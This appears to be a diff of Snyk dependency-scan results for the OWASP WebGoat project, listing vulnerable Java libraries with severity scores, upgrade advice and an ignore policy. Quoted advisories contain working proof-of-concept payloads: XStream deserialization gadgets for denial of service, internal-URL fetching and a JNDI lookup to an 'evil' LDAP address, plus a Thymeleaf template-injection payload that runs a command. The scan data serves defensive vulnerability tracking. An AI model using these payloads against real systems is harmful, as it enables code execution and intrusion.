-          "key": "00000047-0000-4000-8000-000000000047",
-          "locations": [
-            {
-              "package": {
-                "name": "io.undertow:undertow-core",
-                "version": "2.3.10.Final"
-              },
-              "type": "package"
-            }
+              "severity": "high",
+              "source": "snyk_vuln"
+            },
+            { "id": "CWE-200", "source": "cwe" },
+            { "id": "GHSA-rgh3-987h-wpmw", "source": "ghsa" },
+            { "id": "CVE-2016-3674", "source": "cve" }
           ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 280
-            }
-          },
-          "title": "Uncontrolled Resource Consumption ('Resource Exhaustion')"
+          "rating": { "severity": "high" },
+          "risk": { "risk_score": { "value": 139 } },
+          "title": "XML External Entity (XXE) Injection"
         },
-        "id": "00000047-0000-4000-8000-000000000047",
+        "id": "00000000-0000-0000-0000-000000000022",
         "links": {},
         "relationships": {
           "fix": {
@@ -15400,21 +3741,17 @@
               "attributes": {
                 "action": {
                   "format": "upgrade_package_advice",
-                  "package_name": "io.undertow:undertow-core",
+                  "package_name": "com.thoughtworks.xstream:xstream",
                   "upgrade_paths": [
                     {
                       "dependency_path": [
                         {
                           "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-undertow",
-                          "version": "3.2.10"
+                          "version": "2025.4-SNAPSHOT"
                         },
                         {
-                          "name": "io.undertow:undertow-core",
-                          "version": "2.3.17.Final"
+                          "name": "com.thoughtworks.xstream:xstream",
+                          "version": "1.4.9"
                         }
                       ],
                       "is_drop": false
@@ -15423,7 +3760,7 @@
                 },
                 "outcome": "fully_resolved"
               },
-              "id": "00000047-0000-4000-8000-000000000047",
+              "id": "00000000-0000-0000-0000-000000000022",
               "type": "fixes"
             }
           }
@@ -15433,96 +3770,168 @@
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n[ch.qos.logback:logback-core](https://mvnrepository.com/artifact/ch.qos.logback/logback-core) is a logback-core module.\n\nAffected versions of this package are vulnerable to Improper Neutralization of Special Elements via the `JaninoEventEvaluator` extension. An attacker can execute arbitrary code by compromising an existing logback configuration file or injecting an environment variable before program execution.\n## Remediation\nUpgrade `ch.qos.logback:logback-core` to version 1.3.15, 1.5.13 or higher.\n## References\n- [Additional Information](https://logback.qos.ch/news.html#1.5.13)\n- [GitHub Commit](https://github.com/qos-ch/logback/commit/2cb6d520df7592ef1c3a198f1b5df3c10c93e183)\n- [GitHub Commit](https://github.com/qos-ch/logback/commit/b44b940cc7d4839e06e31a7d60dca174b99c1aa5)\n- [Release Notes](https://logback.qos.ch/news.html#1.3.15)\n",
+          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to occupy a thread that consumes maximum CPU time and will never return. An attacker can manipulate the processed input stream and replace or inject objects, that result in executed evaluation of a malicious regular expression, causing a denial of service.\r\n\r\n### PoC\r\n```\r\n\u003cjava.util.PriorityQueue serialization='custom'\u003e\r\n  \u003cunserializable-parents/\u003e\r\n  \u003cjava.util.PriorityQueue\u003e\r\n    \u003cdefault\u003e\r\n      \u003csize\u003e2\u003c/size\u003e\r\n      \u003ccomparator class='javafx.collections.ObservableList$1'/\u003e\r\n    \u003c/default\u003e\r\n    \u003cint\u003e3\u003c/int\u003e\r\n    \u003ccom.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\u003e\r\n      \u003cdataHandler\u003e\r\n        \u003cdataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'\u003e\r\n          \u003ccontentType\u003etext/plain\u003c/contentType\u003e\r\n          \u003cis class='java.io.SequenceInputStream'\u003e\r\n            \u003ce class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'\u003e\r\n              \u003citerator class='java.util.Scanner'\u003e\r\n                \u003cbuf class='java.nio.HeapCharBuffer'\u003e\r\n                  \u003cmark\u003e-1\u003c/mark\u003e\r\n                  \u003cposition\u003e0\u003c/position\u003e\r\n                  \u003climit\u003e0\u003c/limit\u003e\r\n                  \u003ccapacity\u003e1024\u003c/capacity\u003e\r\n                  \u003caddress\u003e0\u003c/address\u003e\r\n                  \u003chb\u003e\u003c/hb\u003e\r\n                  \u003coffset\u003e0\u003c/offset\u003e\r\n                  \u003cisReadOnly\u003efalse\u003c/isReadOnly\u003e\r\n                \u003c/buf\u003e\r\n                \u003cposition\u003e0\u003c/position\u003e\r\n                \u003cmatcher\u003e\r\n                  \u003cparentPattern\u003e\r\n                    \u003cpattern\u003e\\p{javaWhitespace}+\u003c/pattern\u003e\r\n                    \u003cflags\u003e0\u003c/flags\u003e\r\n                  \u003c/parentPattern\u003e\r\n                  \u003cfrom\u003e0\u003c/from\u003e\r\n                  \u003cto\u003e0\u003c/to\u003e\r\n                  \u003clookbehindTo\u003e0\u003c/lookbehindTo\u003e\r\n                  \u003ctext class='java.nio.HeapCharBuffer' reference='../../buf'/\u003e\r\n                  \u003cacceptMode\u003e0\u003c/acceptMode\u003e\r\n                  \u003cfirst\u003e-1\u003c/first\u003e\r\n                  \u003clast\u003e0\u003c/last\u003e\r\n                  \u003coldLast\u003e-1\u003c/oldLast\u003e\r\n                  \u003clastAppendPosition\u003e0\u003c/lastAppendPosition\u003e\r\n                  \u003clocals/\u003e\r\n                  \u003chitEnd\u003efalse\u003c/hitEnd\u003e\r\n                  \u003crequireEnd\u003efalse\u003c/requireEnd\u003e\r\n                  \u003ctransparentBounds\u003etrue\u003c/transparentBounds\u003e\r\n                  \u003canchoringBounds\u003efalse\u003c/anchoringBounds\u003e\r\n                \u003c/matcher\u003e\r\n                \u003cdelimPattern\u003e\r\n                  \u003cpattern\u003e(x+)*y\u003c/pattern\u003e\r\n                  \u003cflags\u003e0\u003c/flags\u003e\r\n                \u003c/delimPattern\u003e\r\n                \u003chasNextPosition\u003e0\u003c/hasNextPosition\u003e\r\n                \u003csource class='java.io.StringReader'\u003e\r\n                  \u003clock class='java.io.StringReader' reference='..'/\u003e\r\n                  \u003cstr\u003exxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\u003c/str\u003e\r\n                  \u003clength\u003e32\u003c/length\u003e\r\n                  \u003cnext\u003e0\u003c/next\u003e\r\n                  \u003cmark\u003e0\u003c/mark\u003e\r\n                \u003c/source\u003e\r\n              \u003c/iterator\u003e\r\n              \u003ctype\u003eKEYS\u003c/type\u003e\r\n            \u003c/e\u003e\r\n            \u003cin class='java.io.ByteArrayInputStream'\u003e\r\n              \u003cbuf\u003e\u003c/buf\u003e\r\n              \u003cpos\u003e0\u003c/pos\u003e\r\n              \u003cmark\u003e0\u003c/mark\u003e\r\n              \u003ccount\u003e0\u003c/count\u003e\r\n            \u003c/in\u003e\r\n          \u003c/is\u003e\r\n          \u003cconsumed\u003efalse\u003c/consumed\u003e\r\n        \u003c/dataSource\u003e\r\n        \u003ctransferFlavors/\u003e\r\n      \u003c/dataHandler\u003e\r\n      \u003cdataLen\u003e0\u003c/dataLen\u003e\r\n    \u003c/com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\u003e\r\n    \u003ccom.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/\u003e\r\n  \u003c/java.util.PriorityQueue\u003e\r\n\u003c/java.util.PriorityQueue\u003e\r\n```\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found i",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-validation",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-logging",
-                  "version": "3.1.5"
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
-                  "name": "ch.qos.logback:logback-classic",
-                  "version": "1.4.11"
-                },
-                {
-                  "name": "ch.qos.logback:logback-core",
-                  "version": "1.4.11"
+                  "name": "com.thoughtworks.xstream:xstream",
+                  "version": "1.4.5"
                 }
               ],
               "source": "dependency_path"
             }
           ],
           "finding_type": "sca",
-          "key": "00000048-0000-4000-8000-000000000048",
+          "key": "00000000-0000-0000-0000-000000000023",
           "locations": [
             {
               "package": {
-                "name": "ch.qos.logback:logback-core",
-                "version": "1.4.11"
+                "name": "com.thoughtworks.xstream:xstream",
+                "version": "1.4.5"
               },
               "type": "package"
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "medium"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 42
-            }
+          "problems": [
+            { "id": "CWE-502", "source": "cwe" },
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[,1.4.16)"],
+              "created_at": "2021-03-23T12:38:22.474553Z",
+              "credits": ["threedr3am"],
+              "cvss_base_score": 5.3,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 5.3,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-06T13:56:27.329623Z",
+                  "severity": "medium",
+                  "type": "primary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H/E:P"
+                },
+                {
+                  "assigner": "NVD",
+                  "base_score": 7.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:48:16.276044Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 5.9,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:53:55.181822Z",
+                  "severity": "medium",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
+                },
+                {
+                  "assigner": "SUSE",
+                  "base_score": 5.9,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:49:11.08519Z",
+                  "severity": "medium",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
+                }
+              ],
+              "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H/E:P",
+              "disclosed_at": "2021-03-23T12:31:43Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.42134",
+                "probability": "0.00199"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "proof of concept",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "proof of concept",
+                    "type": "primary"
+                  }
+                ],
+                "sources": ["Snyk"]
+              },
+              "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088330",
+              "initially_fixed_in_versions": ["1.4.16"],
+              "is_fixable": true,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2024-03-11T09:53:55.181822Z",
+              "package_name": "com.thoughtworks.xstream:xstream",
+              "package_version": "",
+              "published_at": "2021-03-23T17:13:21.767895Z",
+              "references": [
+                {
+                  "title": "XStream Advisory",
+                  "url": "https://x-stream.github.io/CVE-2021-21348.html"
+                },
+                {
+                  "title": "XStream Changelog",
+                  "url": "http://x-stream.github.io/changes.html%231.4.16"
+                },
+                {
+                  "title": "XStream Workaround",
+                  "url": "https://x-stream.github.io/security.html%23workaround"
+                }
+              ],
+              "severity": "medium",
+              "source": "snyk_vuln"
+            },
+            { "id": "CVE-2021-21348", "source": "cve" },
+            { "id": "GHSA-56p8-3fh9-4cvq", "source": "ghsa" }
+          ],
+          "rating": { "severity": "medium" },
+          "risk": { "risk_score": { "value": 141 } },
+          "suppression": {
+            "created_at": "2025-11-19T13:58:19.795Z",
+            "expires_at": "2026-11-10T22:00:00Z",
+            "justification": "Does not apply",
+            "path": ["*"],
+            "policy": { "id": "8e4e23a7-0473-4467-b66b-b50fc8015ae7" },
+            "status": "ignored"
           },
-          "title": "Improper Neutralization of Special Elements"
+          "title": "Deserialization of Untrusted Data"
         },
-        "id": "00000048-0000-4000-8000-000000000048",
+        "id": "00000000-0000-0000-0000-000000000023",
         "links": {},
         "relationships": {
           "fix": {
-            "data": {
-              "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "ch.qos.logback:logback-core",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-validation",
-                          "version": "3.3.8"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter",
-                          "version": "3.3.8"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-logging",
-                          "version": "3.3.8"
-                        },
+            "data": {
+              "attributes": {
+                "action": {
+                  "format": "upgrade_package_advice",
+                  "package_name": "com.thoughtworks.xstream:xstream",
+                  "upgrade_paths": [
+                    {
+                      "dependency_path": [
                         {
-                          "name": "ch.qos.logback:logback-classic",
-                          "version": "1.5.16"
+                          "name": "org.owasp.webgoat:webgoat",
+                          "version": "2025.4-SNAPSHOT"
                         },
                         {
-                          "name": "ch.qos.logback:logback-core",
-                          "version": "1.5.16"
+                          "name": "com.thoughtworks.xstream:xstream",
+                          "version": "1.4.16"
                         }
                       ],
                       "is_drop": false
@@ -15531,9 +3940,41 @@
                 },
                 "outcome": "fully_resolved"
               },
-              "id": "00000048-0000-4000-8000-000000000048",
+              "id": "00000000-0000-0000-0000-000000000023",
               "type": "fixes"
             }
+          },
+          "policy": {
+            "data": {
+              "attributes": {
+                "policies": [
+                  {
+                    "applied_policy": {
+                      "action_type": "ignore",
+                      "ignore": {
+                        "created": "2025-11-19T13:58:19.795Z",
+                        "disregard_if_fixable": false,
+                        "expires": "2026-11-10T22:00:00Z",
+                        "ignored_by": {
+                          "email": "catalin.iuga@snyk.io",
+                          "id": "41f56271-2447-4a42-9708-7bbeec29acd0",
+                          "name": "Catalin"
+                        },
+                        "path": ["*"],
+                        "reason": "Does not apply",
+                        "reason_type": "wont-fix",
+                        "source": "api"
+                      }
+                    },
+                    "id": "8e4e23a7-0473-4467-b66b-b50fc8015ae7",
+                    "type": "legacy_policy_snapshot"
+                  }
+                ]
+              },
+              "id": "5f7d8443-7b74-4f32-a63e-a74d575f107d",
+              "type": "policies"
+            },
+            "links": {}
           }
         },
         "type": "findings"
@@ -15541,13 +3982,13 @@
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. This vulnerability may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream with a Java runtime version 14 to 8. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.\r\n\r\n### PoC\r\n\r\n```\r\n\u003cmap\u003e\r\n  \u003centry\u003e\r\n    \u003cjdk.nashorn.internal.runtime.Source_-URLData\u003e\r\n      \u003curl\u003ehttp://localhost:8080/internal/\u003c/url\u003e\r\n      \u003ccs\u003eGBK\u003c/cs\u003e\r\n      \u003chash\u003e1111\u003c/hash\u003e\r\n      \u003carray\u003eb\u003c/array\u003e\r\n      \u003clength\u003e0\u003c/length\u003e\r\n      \u003clastModified\u003e0\u003c/lastModified\u003e\r\n    \u003c/jdk.nashorn.internal.runtime.Source_-URLData\u003e\r\n    \u003cjdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/\u003e\r\n  \u003c/entry\u003e\r\n  \u003centry\u003e\r\n    \u003cjdk.nashorn.internal.runtime.Source_-URLData\u003e\r\n      \u003curl\u003ehttp://localhost:8080/internal/\u003c/url\u003e\r\n      \u003ccs reference='../../../entry/jdk.nashorn.internal.runtime.Source_-URLData/cs'/\u003e\r\n      \u003chash\u003e1111\u003c/hash\u003e\r\n      \u003carray\u003eb\u003c/array\u003e\r\n      \u003clength\u003e0\u003c/length\u003e\r\n      \u003clastModified\u003e0\u003c/lastModified\u003e\r\n    \u003c/jdk.nashorn.internal.runtime.Source_-URLData\u003e\r\n    \u003cjdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/\u003e\r\n  \u003c/entry\u003e\r\n\u003c/map\u003e\r\n```\r\n\r\n```\r\nXStream xstream = new XStream();\r\nxstream.fromXML(xml);\r\n```\n## Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.18 or higher.\n## References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-39152.html)\n- [XStream Changelog](https://x-stream.github.io/changes.html#1.4.18)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-39152.yaml)\n",
+          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n\r\n### PoC\r\n\r\n```\r\n\u003csorted-set\u003e\r\n  \u003cjavax.naming.ldap.Rdn_-RdnEntry\u003e\r\n    \u003ctype\u003etest\u003c/type\u003e\r\n    \u003cvalue class='javax.swing.MultiUIDefaults' serialization='custom'\u003e\r\n      \u003cunserializable-parents/\u003e\r\n      \u003chashtable\u003e\r\n          \u003cdefault\u003e\r\n            \u003cloadFactor\u003e0.75\u003c/loadFactor\u003e\r\n            \u003cthreshold\u003e525\u003c/threshold\u003e\r\n          \u003c/default\u003e\r\n          \u003cint\u003e700\u003c/int\u003e\r\n          \u003cint\u003e0\u003c/int\u003e\r\n      \u003c/hashtable\u003e\r\n      \u003cjavax.swing.UIDefaults\u003e\r\n          \u003cdefault\u003e\r\n            \u003cdefaultLocale\u003ezh_CN\u003c/defaultLocale\u003e\r\n            \u003cresourceCache/\u003e\r\n          \u003c/default\u003e\r\n      \u003c/javax.swing.UIDefaults\u003e\r\n      \u003cjavax.swing.MultiUIDefaults\u003e\r\n          \u003cdefault\u003e\r\n            \u003ctables\u003e\r\n            \u003cjavax.swing.UIDefaults serialization='custom'\u003e\r\n              \u003cunserializable-parents/\u003e\r\n              \u003chashtable\u003e\r\n                \u003cdefault\u003e\r\n                  \u003cloadFactor\u003e0.75\u003c/loadFactor\u003e\r\n                  \u003cthreshold\u003e525\u003c/threshold\u003e\r\n                \u003c/default\u003e\r\n                \u003cint\u003e700\u003c/int\u003e\r\n                \u003cint\u003e1\u003c/int\u003e\r\n                \u003cstring\u003elazyValue\u003c/string\u003e\r\n                \u003cjavax.swing.UIDefaults_-ProxyLazyValue\u003e\r\n                  \u003cclassName\u003ejavax.naming.InitialContext\u003c/className\u003e\r\n                  \u003cmethodName\u003edoLookup\u003c/methodName\u003e\r\n                  \u003cargs\u003e\r\n                    \u003cstring\u003eldap://127.0.0.1:1389/#evil\u003c/string\u003e\r\n                  \u003c/args\u003e\r\n                \u003c/javax.swing.UIDefaults_-ProxyLazyValue\u003e\r\n              \u003c/hashtable\u003e\r\n              \u003cjavax.swing.UIDefaults\u003e\r\n                \u003cdefault\u003e\r\n                  \u003cdefaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/\u003e\r\n                  \u003cresourceCache/\u003e\r\n                \u003c/default\u003e\r\n              \u003c/javax.swing.UIDefaults\u003e\r\n            \u003c/javax.swing.UIDefaults\u003e\r\n            \u003c/tables\u003e\r\n          \u003c/default\u003e\r\n      \u003c/javax.swing.MultiUIDefaults\u003e\r\n    \u003c/value\u003e\r\n  \u003c/javax.naming.ldap.Rdn_-RdnEntry\u003e\r\n  \u003cjavax.naming.ldap.Rdn_-RdnEntry\u003e\r\n    \u003ctype\u003etest\u003c/type\u003e\r\n    \u003cvalue class='com.sun.org.apache.xpath.internal.objects.XString'\u003e\r\n      \u003cm__obj class='string'\u003etest\u003c/m__obj\u003e\r\n    \u003c/value\u003e\r\n  \u003c/javax.naming.ldap.Rdn_-RdnEntry\u003e\r\n\u003c/sorted-set\u003e\r\n```\r\n\r\n```\r\nXStream xstream = new XStream();\r\nxstream.fromXML(xml);\r\n```\n## Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.18 or higher.\n## References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-39146.html)\n- [XStream Changelog](https://x-stream.github.io/changes.html#1.4.18)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-39146.yaml)\n",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
                   "name": "com.thoughtworks.xstream:xstream",
@@ -15558,7 +3999,7 @@
             }
           ],
           "finding_type": "sca",
-          "key": "00000049-0000-4000-8000-000000000049",
+          "key": "00000000-0000-0000-0000-000000000024",
           "locations": [
             {
               "package": {
@@ -15569,18 +4010,114 @@
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 501
-            }
-          },
-          "title": "Deserialization of Untrusted Data"
+          "problems": [
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[,1.4.18)"],
+              "created_at": "2021-08-24T07:58:23.064814Z",
+              "credits": ["Ceclin and YXXX"],
+              "cvss_base_score": 8.5,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 8.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-06T13:58:20.248372Z",
+                  "severity": "high",
+                  "type": "primary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P"
+                },
+                {
+                  "assigner": "NVD",
+                  "base_score": 8.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:51:50.603895Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 8.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:53:55.606621Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "SUSE",
+                  "base_score": 8.1,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:49:57.206197Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
+                }
+              ],
+              "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P",
+              "disclosed_at": "2021-08-24T07:56:49Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.97899",
+                "probability": "0.54176"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "proof of concept",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "proof of concept",
+                    "type": "primary"
+                  }
+                ],
+                "sources": ["Nuclei Templates", "Snyk"]
+              },
+              "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569180",
+              "initially_fixed_in_versions": ["1.4.18"],
+              "is_fixable": true,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2025-11-16T05:01:58.290484Z",
+              "package_name": "com.thoughtworks.xstream:xstream",
+              "package_version": "",
+              "published_at": "2021-08-24T15:09:25.253783Z",
+              "references": [
+                {
+                  "title": "XStream Advisory",
+                  "url": "https://x-stream.github.io/CVE-2021-39146.html"
+                },
+                {
+                  "title": "XStream Changelog",
+                  "url": "https://x-stream.github.io/changes.html%231.4.18"
+                },
+                {
+                  "title": "Nuclei Templates",
+                  "url": "https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-39146.yaml"
+                }
+              ],
+              "severity": "high",
+              "source": "snyk_vuln"
+            },
+            { "id": "CWE-434", "source": "cwe" },
+            { "id": "CVE-2021-39146", "source": "cve" },
+            { "id": "GHSA-p8pq-r894-fm8f", "source": "ghsa" }
+          ],
+          "rating": { "severity": "high" },
+          "risk": { "risk_score": { "value": 455 } },
+          "title": "Arbitrary Code Execution"
         },
-        "id": "00000049-0000-4000-8000-000000000049",
+        "id": "00000000-0000-0000-0000-000000000024",
         "links": {},
         "relationships": {
           "fix": {
@@ -15594,7 +4131,7 @@
                       "dependency_path": [
                         {
                           "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
+                          "version": "2025.4-SNAPSHOT"
                         },
                         {
                           "name": "com.thoughtworks.xstream:xstream",
@@ -15607,7 +4144,7 @@
                 },
                 "outcome": "fully_resolved"
               },
-              "id": "00000049-0000-4000-8000-000000000049",
+              "id": "00000000-0000-0000-0000-000000000024",
               "type": "fixes"
             }
           }
@@ -15617,105 +4154,142 @@
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n\nAffected versions of this package are vulnerable to Sandbox Bypass due to insufficient checks, by allowing an attacker to execute arbitrary code via a crafted HTML.\n## PoC\n```\r\n\u003c!DOCTYPE html\u003e\r\n\u003chtml xmlns:th=\"http://www.thymeleaf.org\"\u003e\r\n\u003chead\u003e\r\n    \u003cmeta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\"/\u003e\r\n\u003c/head\u003e\r\n\u003cbody\u003e\r\n\r\n\u003ctr\r\n        th:with=\"getRuntimeMethod=${T(org.springframework.util.ReflectionUtils).findMethod(T(org.springframework.util.ClassUtils).forName('java.lang.Runtime',T(org.springframework.util.ClassUtils).getDefaultClassLoader()), 'getRuntime' )}\"\r\n\u003e\r\n    \u003ctd\u003e\r\n        \u003ca\r\n                th:with=\"runtimeObj=${T(org.springframework.util.ReflectionUtils).invokeMethod(getRuntimeMethod, null)}\"\r\n        \u003e\r\n            \u003ca\r\n                    th:with=\"exeMethod=${T(org.springframework.util.ReflectionUtils).findMethod(T(org.springframework.util.ClassUtils).forName('java.lang.Runtime',T(org.springframework.util.ClassUtils).getDefaultClassLoader()), 'exec', ''.getClass() )}\"\r\n            \u003e\r\n                \u003ca\r\n                        th:with=\"param2=${T(org.springframework.util.ReflectionUtils).invokeMethod(exeMethod, runtimeObj, 'calc' )\r\n                }\"\r\n                        th:href=\"${param2}\"\r\n                \u003e\u003c/a\u003e\r\n            \u003c/a\u003e\r\n\r\n        \u003c/a\u003e\r\n    \u003c/td\u003e\r\n\u003c/tr\u003e\r\n\r\n\u003c/body\u003e\r\n\u003c/html\u003e\r\n```\n## Remediation\nUpgrade `org.thymeleaf:thymeleaf` to version 3.1.2.RELEASE or higher.\n## References\n- [GitHub Commit](https://github.com/thymeleaf/thymeleaf/issues/966)\n- [PoC](https://github.com/p1n93r/SpringBootAdmin-thymeleaf-SSTI)\n",
